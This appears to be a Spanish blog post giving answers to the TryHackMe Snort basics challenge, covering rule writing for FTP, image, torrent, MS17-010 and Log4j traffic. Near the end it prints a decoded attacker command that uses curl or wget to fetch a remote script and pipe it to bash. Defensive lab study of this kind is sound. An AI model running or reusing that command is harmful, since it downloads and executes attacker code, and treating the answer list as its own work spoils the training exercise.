Cubrimos el uso de Snort para analizar el tráfico FTP y HTTP mediante la creación y configuración de las reglas apropiadas. Para aplicar lo que aprendimos, analizamos determinadas capturas de red utilizando Snort para probar las reglas creadas y detectar patrones de tráfico. Esto fue parte de Desafío TryHackMe Snort: conceptos básicos.

Notas de estudio de Snort

Curso completo de Splunk SIEM con escenarios prácticos

Reflejos

SNORT es un sistema de prevención y detección de intrusiones en la red (NIDS/NIPS) de código abierto y basado en reglas. Fue desarrollado y mantenido por Martin Roesch, contribuyentes de código abierto y el equipo de Cisco Talos. 
Capacidades de Snort

  • Análisis de tráfico en vivo
  • Detección de ataques y sondas
  • Registro de paquetes
  • Análisis de protocolo
  • Alertas en tiempo real
  • Módulos y complementos
  • Preprocesadores
  • ¡Soporte multiplataforma! (Linux y Windows)

Modos de funcionamiento del Snort IDS

  • Modo rastreador – Leer paquetes IP y solicitarlos en la aplicación de consola.
  • Modo de registrador de paquetes – Registre todos los paquetes IP (entrantes y salientes) que visitan la red.
  • Modos NIDS y NIPS: Registre/descarte los paquetes que se consideran maliciosos según las reglas definidas por el usuario

Respuestas de la habitación | Desafío de resoplido: conceptos básicos

¿Cuál es la cantidad de paquetes detectados?

Nota: Debes responder esta pregunta correctamente antes de responder el resto de las preguntas de esta tarea.

328

Investigue el archivo de registro.

¿Cuál es la dirección de destino del paquete 63?

145.254.160.237

Investigue el archivo de registro.

 ¿Cuál es el número ACK del paquete 64?

0x38AFFFF3

Investigue el archivo de registro.

¿Cuál es el número SEQ del paquete 62?

0x38AFFFF3

W.

Investigue el archivo de registro.

¿Cuál es el TTL del paquete 65?

128

Investigue el archivo de registro.

¿Cuál es la IP de origen del paquete 65?

145.254.160.237

Investigue el archivo de registro.

¿Cuál es el puerto de origen del paquete 65?

3372

Utilice el archivo pcap proporcionado.

Escribir reglas para detectar “todo el puerto TCP 21”tráfico en el pcap dado.

¿Cuál es la cantidad de paquetes detectados?

614

Investigue el archivo de registro.

¿Cuál es el nombre del servicio FTP?

Servicio FTP de Microsoft

Borre los archivos de registro y alarma anteriores.

Desactivar/comentar las reglas antiguas.

Escriba una regla para detectar intentos fallidos de inicio de sesión FTP en el pcap dado.

¿Cuál es la cantidad de paquetes detectados?

41

Borre los archivos de registro y alarma anteriores.

Desactivar/comentar la antigua regla.

Escriba una regla para detectar inicios de sesión FTP exitosos en el pcap dado.

¿Cuál es la cantidad de paquetes detectados?

1

Borre los archivos de registro y alarma anteriores.

Desactivar/comentar la antigua regla.

Escribe una regla para detectar errores. ftp intentos de inicio de sesión con un nombre de usuario válido pero una contraseña incorrecta o sin contraseña.

¿Cuál es la cantidad de paquetes detectados?

42

Borre los archivos de registro y alarma anteriores.

Desactivar/comentar la antigua regla.

Escribe una regla para detectar errores. ftp intentos de inicio de sesión con el nombre de usuario "Administrador" pero una contraseña incorrecta o sin contraseña.

¿Cuál es la cantidad de paquetes detectados?

7

Navegue a la carpeta de tareas.

Utilice el archivo pcap proporcionado.

Escriba una regla para detectar el archivo PNG en el pcap dado.

Investigue los registros e identifique el nombre del software incluido en el paquete.

Adobe Imagereadyq

Borre los archivos de registro y alarma anteriores.

Desactivar/comentar la antigua regla.

Escriba una regla para detectar el archivo GIF en el pcap dado.

Investigue los registros e identifique el formato de imagen incrustado en el paquete.

GIF89a

Navegue a la carpeta de tareas.

Utilice el archivo pcap proporcionado.

Escriba una regla para detectar el metarchivo torrent en el pcap dado.

 ¿Cuál es la cantidad de paquetes detectados?

2

Investigue los archivos de registro/alarma.

¿Cómo se llama la aplicación torrent?

bittorrent

Investigue los archivos de registro/alarma.

¿Cuál es el tipo MIME (Extensiones multipropósito de correo de Internet) del metarchivo torrent?

aplicación/x-bittorrent

Investigue los archivos de registro/alarma.

¿Cuál es el nombre de host del metarchivo torrent?

tracker2.torrentbox.com

En esta sección, debe corregir los errores de sintaxis en los archivos de reglas proporcionados. 

Puede probar cada conjunto de reglas con la siguiente estructura de comandos;

sudo snort -c local-X.rules -r mx-1.pcap -A consola

Corrija el error de sintaxis en el archivo local-1.rules y haga que funcione sin problemas.

¿Cuál es el número de paquetes detectados?

16

Corrija el error de sintaxis en el archivo local-2.rules y haga que funcione sin problemas.

¿Cuál es el número de paquetes detectados?

68

Corrija el error de sintaxis en el archivo local-3.rules y haga que funcione sin problemas.

¿Cuál es el número de paquetes detectados?

87

Corrija el error de sintaxis en el archivo local-4.rules y haga que funcione sin problemas.

¿Cuál es el número de paquetes detectados?

90

Corrija el error de sintaxis en el archivo local-5.rules y haga que funcione sin problemas.

¿Cuál es el número de paquetes detectados?

155

Corrija el error lógico en el archivo local-6.rules y haga que funcione sin problemas para crear alertas.

¿Cuál es el número de paquetes detectados?

2

Corrija el error lógico en el archivo local-7.rules y haga que funcione sin problemas para crear alertas.

¿Cuál es el nombre de la opción requerida?

mensaje

Navegue a la carpeta de tareas.

Utilice el archivo pcap proporcionado.

Utilice el archivo de reglas proporcionado (local.rules) para investigar la explotación de ms1710.

¿Cuál es la cantidad de paquetes detectados?

25154

Borre los archivos de registro y alarma anteriores.

Utilice el archivo vacío local-1.rules para escribir una nueva regla para detectar cargas útiles que contengan la palabra clave “\IPC$”.

¿Cuál es la cantidad de paquetes detectados?

12

Investigue los archivos de registro/alarma.

Qué Cuál es el camino solicitado?

\192.168.116.138\IPC$

¿Cuál es la puntuación CVSS v2 de la vulnerabilidad MS17-010?

9.3

Utilice el archivo pcap proporcionado.

Utilice el archivo de reglas proporcionado (local.rules) para investigar la explotación de log4j.

¿Cuál es la cantidad de paquetes detectados?

26

Investigue los archivos de registro/alarma.

¿Cuántas reglas se activaron?.

4

Investigue los archivos de registro/alarma.

¿Cuáles son los primeros seis dígitos de las reglas activadas?

210037

Borre los archivos de registro y alarma anteriores.

Utilice el archivo vacío local-1.rules para escribir una nueva regla para detectar cargas útiles de paquetes entre 770 y 855 bytes.

¿Cuál es la cantidad de paquetes detectados?

41

Investigue los archivos de registro/alarma.

Qué ¿Cuál es el nombre del algoritmo de codificación utilizado?

base64

Investigue los archivos de registro/alarma.

Qué Cuál es el ID de IP del paquete correspondiente?

62808

Investigue los archivos de registro/alarma.

Decodifica el comando codificado.

¿Cuál es la orden del atacante?

(curl -s 45.155.205.233:5874/162.0.228.253:80||wget -q -O- 45.155.205.233:5874/162.0.228.253:80)|bash

¿Cuál es la puntuación CVSS v2 de la vulnerabilidad Log4j?

9.3

Tutorial en vídeo | Desafío TryHackMe Snort: conceptos básicos

, , ,
Mostrar Comentarios

Motasem

Acerca del Autor

Creo notas de ciberseguridad, notas de marketing digital y cursos online. También brindo consultoría de marketing digital que incluye, entre otros, SEO, Google y meta anuncios y administración de CRM.

Ver Artículos